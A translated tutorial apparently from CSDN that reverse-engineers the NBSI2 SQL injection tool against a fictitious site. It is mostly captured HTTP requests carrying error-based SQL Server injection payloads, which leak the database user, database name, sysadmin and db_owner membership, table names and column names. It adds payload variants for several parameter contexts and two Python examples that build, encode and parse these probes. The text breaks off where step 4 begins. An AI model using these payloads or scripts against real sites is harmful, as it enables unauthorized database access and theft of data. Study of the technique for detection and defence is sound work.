
Demystifying the Internals of NBSI2

  Author: 虚空   Source: www.csdn.net
  SQL injection has been popular for a while. Anyone who has used 小竹's NB2 knows that the tool is close to unbeatable: even a newbie can own a site with it in seconds. But without understanding the injection process behind it, you will never improve.
  Let me say up front that I am a newbie too. I have been studying SQL recently and took the opportunity to trace NB2's injection process. The tool used is WSE, which everyone should know; it can be downloaded all over the net, for example from http://www.gxgl.com/soft/WSE06b1.zip. WSE monitors and modifies the data a program sends and receives over the network, which makes it handy for debugging network applications.
  Enough talk, let's get to work. Pick a site with a SQL injection flaw, www.testdb.net, and find an injection point: http://www.testdb.net/article_read.asp?id=80
  (The domain www.testdb.net is of course fictitious.)
  Step 1: Obtaining SQL Server database information
  Open NB2, enter http://www.testdb.net/article_read.asp?id=80, choose the "GET" method and click "Detect".
  NB2 reports the following about the SQL Server database:
  Multiple statements: unknown
  Subqueries: supported
  Current user: test
  User privilege: DB_OWNER
  Current database: testdb
  Anyone who has used NB2 will recognise this output. Now let's see how it is obtained.
  In the captured requests, %20 decodes to a space, %2B to '+' and %25 to '%'.
  HTTP/1.1 200 OK                     // the statement executed without error
  HTTP/1.1 500 Internal Server Error  // the statement raised an error, and IIS returns the ODBC error text in the page
  The GET requests captured with WSE (note the User-Agent, Microsoft URL Control - 6.00.8862: it is not a browser string, so it is an easy marker of this tool in web server logs):
  GET /article_read.asp?id=80 HTTP/1.1
  GET /article_read.asp?id=80%20and%20user%2Bchar(124)=0 HTTP/1.1
  i.e. article_read.asp?id=80 and user+char(124)=0
  char(124) is the character '|'
  GET /article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1
  i.e. article_read.asp?id=80;declare @a int--
  // tests whether multiple (stacked) statements are supported: a harmless second statement is appended after a semicolon, and a 200 response means it executed
  GET /article_read.asp?id=80%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80%3Bdeclare+%40a+int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  i.e. article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0
  // tests whether subqueries are supported
  GET /article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  i.e. article_read.asp?id=80 And user+char(124)=0
  // obtains the current user
  user is a built-in SQL Server function (usable without parentheses) whose value is the user name of the current connection, of type nvarchar. When an nvarchar value is compared with the integer 0, the server first tries to convert the nvarchar to int, and that conversion inevitably fails. The SQL Server error message reads: Syntax error converting the nvarchar value 'east_asp' to a column of data type int. Here east_asp is the value of user (for the capture above it would be test|), so the database user name is obtained without any effort. The classic form is simply `and user>0`; NB2 appends char(124) so that the value is delimited by '|' in the message, and so that the conversion still fails even if the user name happens to consist only of digits.
  GET /article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  i.e. article_read.asp?id=80 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
  Function description:
  IS_SRVROLEMEMBER indicates whether the login of the current user is a member of the specified server role.
  Syntax
  IS_SRVROLEMEMBER ( 'role' [ , 'login' ] )
  Arguments
  'role'  Name of the server role being checked. role is of type sysname.
  Valid values for role: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin
  'login'  Optional name of the login to check. login is of type sysname and defaults to NULL; if omitted, the login account of the current user is used.
  The function returns 1 when the login is a member of the role, 0 when it is not, and NULL when the role or login is invalid.
  select Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124) gives "1|" for a sysadmin login and "0|" otherwise. Compared with the integer 1, either string fails the conversion, and the error message tells NB2 which of the two it was.
  GET /article_read.asp?id=80%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  i.e. article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1
  select Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124) gives "1|" here, the same as above, but note that the long hex string inside IS_MEMBER differs from the one above. These constants are nvarchar strings written in hex: SQL Server reads a 0x... constant as UCS-2 little-endian, two bytes per character with the low byte first, so 0x730079007300610064006D0069006E00 is 's','y','s','a','d','m','i','n', that is "sysadmin", and 0x640062005F006F0077006E0065007200 is "db_owner". Read as single-byte characters the bytes come out as junk like "|O|@ E", which is why they look meaningless at first sight. Writing the role names this way lets NB2 avoid single quotes in the payload. So this request checks whether the current user is a member of the database role db_owner (IS_MEMBER takes a database role or Windows group, not a server role), and that is where the "User privilege: DB_OWNER" line comes from.
  GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED
  i.e. article_read.asp?id=80 And db_name()+char(124)=0
  This one uses db_name(), which needs little explanation: it is another built-in function, returning the name of the database the connection is using, and the conversion error discloses it exactly as it disclosed user.
  That completes the analysis of how the SQL Server database information is obtained.
  Note: the POST method is not analysed in detail here; you can look at it yourself. The packets captured with POST are essentially the same as with GET, and the interesting part is the last line, the request body. Several tricks appear in it:
  id=80%20and%20user%2Bchar(124)=0
  id=80'%20and%20user%2Bchar(124)=0%20and%20''='
  id=80%25'%20and%20user%2Bchar(124)=0%20and%20'%25'='
  id=80%20And%201=1
  id=80%20And%201=2
  id=80'%20And%201=1%20And%20''='
  id=80'%20And%201=2%20And%20''='
  id=80%25'%20And%201=1%20And%20'%25'='
  id=80%25'%20And%201=2%20And%20'%25'='
  The three shapes cover the ways the parameter can sit in the application's query: as a bare number, inside a single-quoted string (the payload closes the quote and ends with ''=' so that the application's own closing quote completes the expression), and inside a LIKE '%...%' pattern. The 1=1 / 1=2 pairs are the baseline check: if the page differs between the two, the parameter is injectable even when no error text is returned.
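The following is an added Python example, not NBSI's code, that reproduces step one as described above: it builds the probes for the three parameter contexts in the POST list, URL-encodes them as the WSE capture shows, and reads the leaked value back out of the SQL Server conversion error. The target is a constructed stand-in (`fake_send` and `FAKE_RESPONSES`) whose answers mirror this capture; the error text is modelled on the SQL Server 2000 ODBC message quoted above.

```python
import re
from urllib.parse import quote

# Added example, not NBSI's code. Reproduces step one: how the probes are built for
# the three parameter contexts seen in the POST payloads, how they are URL-encoded,
# and how the value leaked by the SQL Server conversion error is read back.

# SQL Server 2000 error 245 as IIS echoes it in a 500 page when the ASP script does
# not trap it. NB2 appends char(124) ('|') to every probed value, so everything
# between the opening quote and the '|' is the value, even when it is all digits.
LEAK_RE = re.compile(
    r"converting the n?varchar value '(.*?)\|' to a column of data type int")

SAFE = "()=,'"   # characters NB2 leaves unencoded in the query string

def wrap(expr, value, context="numeric"):
    """Put a boolean expression after the parameter value the way the three
    captured payload shapes do: bare number, quoted string, LIKE '%...%'."""
    if context == "numeric":
        return f"{value} and {expr}"
    if context == "string":
        return f"{value}' and {expr} and ''='"
    if context == "like":
        return f"{value}%' and {expr} and '%'='"
    raise ValueError(f"unknown context {context!r}")

def probe_url(base, param, value, expr, context="numeric"):
    """Full GET URL: space -> %20, '+' -> %2B, '%' -> %25, as in the WSE capture."""
    return f"{base}?{param}={quote(wrap(expr, value, context), safe=SAFE)}"

def leaked_value(status, body):
    """Value disclosed by the conversion error, or None if the page succeeded."""
    if status != 500:
        return None
    m = LEAK_RE.search(body)
    return m.group(1) if m else None

SYSADMIN_HEX = "0x730079007300610064006D0069006E00"   # N'sysadmin' as a hex constant
DB_OWNER_HEX = "0x640062005F006F0077006E0065007200"   # N'db_owner' as a hex constant

def fingerprint(send, value="80"):
    """The six probes of step one. send(payload) returns (status, body) for a
    request whose id parameter is exactly `payload`."""
    facts = {}
    facts["multi_statement"] = send(f"{value};declare @a int--")[0] == 200
    facts["subquery"] = send(wrap("(Select count(1) from [sysobjects])>=0", value))[0] == 200
    facts["user"] = leaked_value(*send(wrap("user+char(124)=0", value)))
    facts["database"] = leaked_value(*send(wrap("db_name()+char(124)=0", value)))
    role = f"Cast(IS_SRVROLEMEMBER({SYSADMIN_HEX}) as varchar(1))+char(124)=1"
    facts["sysadmin"] = leaked_value(*send(wrap(role, value))) == "1"
    role = f"Cast(IS_MEMBER({DB_OWNER_HEX}) as varchar(1))+char(124)=1"
    facts["db_owner"] = leaked_value(*send(wrap(role, value))) == "1"
    return facts

# --- Constructed stand-in for the target, mirroring the capture (login test,
# database testdb, db_owner but not sysadmin). Not a real server. ---
ODBC = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
        "[Microsoft][ODBC SQL Server Driver][SQL Server]")

def conversion_error(kind, text):
    return 500, (f"{ODBC}Syntax error converting the {kind} value '{text}|' "
                 f"to a column of data type int.")

FAKE_RESPONSES = {
    "80;declare @a int--": (200, "<html>article 80</html>"),
    wrap("(Select count(1) from [sysobjects])>=0", "80"): (200, "<html>article 80</html>"),
    wrap("user+char(124)=0", "80"): conversion_error("nvarchar", "test"),
    wrap("db_name()+char(124)=0", "80"): conversion_error("nvarchar", "testdb"),
    wrap(f"Cast(IS_SRVROLEMEMBER({SYSADMIN_HEX}) as varchar(1))+char(124)=1", "80"):
        conversion_error("varchar", "0"),
    wrap(f"Cast(IS_MEMBER({DB_OWNER_HEX}) as varchar(1))+char(124)=1", "80"):
        conversion_error("varchar", "1"),
}

def fake_send(payload):
    """Any payload the stand-in does not know raises a syntax error, like a real server."""
    return FAKE_RESPONSES.get(payload, (500, f"{ODBC}Incorrect syntax near '{payload}'."))

if __name__ == "__main__":
    print(probe_url("http://www.testdb.net/article_read.asp", "id", "80",
                    "user+char(124)=0", "like"))
    print(fingerprint(fake_send))
```

The whole technique depends on the server echoing the ODBC error into the 500 page; `leaked_value` returns None for a 500 whose body carries no conversion error, which is what you see when custom error pages are enabled, and the 1=1 / 1=2 baseline is then the only signal left.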
  //////////////////////////////////////////////
  Step 2: Guessing table names
  Top 1
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
  i.e. article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from [testdb]..[sysobjects] Where xtype=char(85) order by id) T order by id desc)>0
  char(85)='U' (user table)
  This obtains the name of the first table in the testdb database: the inner query takes the first N user tables ordered by id, the outer query takes the last of those, and comparing the name with 0 makes the conversion error disclose it. Replacing Top 1 with Top N in the inner query gives the Nth table, so the remaining tables are obtained the same way. Once N exceeds the number of tables the inner query simply returns all of them and the last name repeats, which is how the end of the list is recognised.
  Top 2
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
  ...
  Top N
  Packet captured by WSE:
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0
  ...........
  //////////////////////////////////////////////
  Step 3: Guessing column names from a table name
  Table name: article
  Top 1
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(116)%2BNCHAR(101)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(100)%2BNCHAR(98)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
  i.e. article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From [testdb]..[syscolumns] Where id = OBJECT_ID(NCHAR(116)+NCHAR(101)+NCHAR(115)+NCHAR(116)+NCHAR(100)+NCHAR(98)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)) Order by colid) T Order by colid desc)>0
  This obtains the name of the first column of the article table, and Top N gives the remaining columns, exactly as for tables, except that syscolumns is paged by colid and restricted to the table's object id.
  Function description:
  OBJECT_ID returns the database object identification number.
  Syntax OBJECT_ID ( 'object' )
  Argument 'object'
  The object to use. object is of type char or nchar; if it is char, it is implicitly converted to nchar.
  Return type int
  NCHAR(116)+NCHAR(101)+NCHAR(115)+NCHAR(116)+NCHAR(100)+NCHAR(98)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)
  corresponds to the string testdb..ARTICLE: each NCHAR(n) is the Unicode character with code n, and building the name this way keeps single quotes out of the payload. Under a case-insensitive collation (the default) ARTICLE matches the table article.
  Which is: article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From [testdb]..[syscolumns] Where id = OBJECT_ID('testdb..ARTICLE') Order by colid) T Order by colid desc)>0
  Top 2
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%202%20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(116)%2BNCHAR(101)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(100)%2BNCHAR(98)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
  Top N
  ...
  Packet captured by WSE:
  GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(116)%2BNCHAR(101)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(100)%2BNCHAR(98)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
  Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
  User-Agent: Microsoft URL Control - 6.00.8862
  Host: www.testdb.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0
  ...............
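The two quote-free literal encodings used in steps 1 and 3 (the 0x... nvarchar constants inside IS_SRVROLEMEMBER/IS_MEMBER and the NCHAR(n)+NCHAR(n) chain inside OBJECT_ID) and the nested TOP-N / ORDER BY DESC paging of steps 2 and 3, as an added Python example. It is not NBSI's code; the sysobjects and syscolumns rows it walks are constructed for the example, and `nth_by_paging` models in Python what the nested TOP does on the server.

```python
import re

# Added example, not NBSI's code. Covers the two quote-free literal encodings NB2
# uses (0x... nvarchar constants and NCHAR(n)+NCHAR(n) chains) and the nested
# TOP-N / ORDER BY DESC paging that reads the N-th row of sysobjects or syscolumns.

def nvarchar_hex(text):
    """N'text' written as a 0x... constant: SQL Server reads it as UCS-2 little-endian."""
    return "0x" + text.encode("utf-16-le").hex().upper()

def decode_nvarchar_hex(literal):
    """Reverse of nvarchar_hex, for constants seen in a capture."""
    return bytes.fromhex(literal[2:]).decode("utf-16-le")

def nchar_chain(text):
    """'text' as NCHAR(c1)+NCHAR(c2)+..., the form NB2 uses inside OBJECT_ID()."""
    return "+".join(f"NCHAR({ord(c)})" for c in text)

def decode_nchar_chain(expr):
    return "".join(chr(int(n)) for n in re.findall(r"NCHAR\((\d+)\)", expr))

def nth_table_expr(db, n):
    """Boolean expression whose conversion error discloses the n-th user table."""
    return (f"(Select Top 1 cast(name as varchar(8000)) from "
            f"(Select Top {n} id,name from [{db}]..[sysobjects] "
            f"Where xtype=char(85) order by id) T order by id desc)>0")

def nth_column_expr(db, table, n):
    """Same paging over syscolumns, restricted to the table's object id."""
    obj = nchar_chain(f"{db}..{table}")
    return (f"(Select Top 1 cast(name as varchar(8000)) from "
            f"(Select Top {n} colid,name From [{db}]..[syscolumns] "
            f"Where id = OBJECT_ID({obj}) Order by colid) T Order by colid desc)>0")

def nth_by_paging(rows, n, key):
    """What the nested TOP does: the first n rows ascending by key, then the last
    of them. When n exceeds the row count the inner query just returns all rows,
    so the last name repeats. An empty set gives None: the real subquery returns
    no row, nothing fails to convert, and the page comes back 200."""
    page = sorted(rows, key=key)[:n]
    return page[-1] if page else None

def enumerate_names(rows, key):
    """Walk n = 1, 2, ... like NB2's Top1, Top2, ... and stop at the first repeat."""
    names, n = [], 1
    while True:
        row = nth_by_paging(rows, n, key)
        if row is None or (names and row[1] == names[-1]):
            return names
        names.append(row[1])
        n += 1

# Constructed slice of sysobjects as (id, name, xtype); ids and names are invented.
SYSOBJECTS = [(3, "article", "U"), (1, "sysobjects", "S"),
              (7, "users", "U"), (5, "sysindexes", "S")]
# Constructed slice of syscolumns for the article table as (colid, name).
SYSCOLUMNS_ARTICLE = [(2, "Title"), (1, "id"), (3, "Content")]

def user_tables(rows=SYSOBJECTS):
    """Names the Top-N walk over xtype='U' rows would disclose, in id order."""
    return enumerate_names([r for r in rows if r[2] == "U"], key=lambda r: r[0])

def columns_of_article(rows=SYSCOLUMNS_ARTICLE):
    return enumerate_names(rows, key=lambda r: r[0])

if __name__ == "__main__":
    print(decode_nvarchar_hex("0x730079007300610064006D0069006E00"))
    print(nth_column_expr("testdb", "ARTICLE", 1))
    print(user_tables(), columns_of_article())
```

`enumerate_names` stops on a repeated name rather than on a 200 response because, as `nth_by_paging` shows, Top N beyond the end still returns the last row; only an empty inner result makes the comparison vanish.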
  //////////////////////////////////////////////
  Step 4: Guessing field contents from a column name
  Column name: Title

